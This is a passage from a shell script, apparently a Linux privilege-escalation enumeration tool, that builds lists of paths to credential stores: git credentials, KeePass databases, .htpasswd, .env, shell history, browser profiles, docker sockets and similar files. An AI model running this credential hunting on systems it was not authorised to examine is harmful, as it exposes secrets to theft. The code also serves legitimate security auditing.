"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_INFLUXDB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ZABBIX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/var|^/usr|^/etc" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E 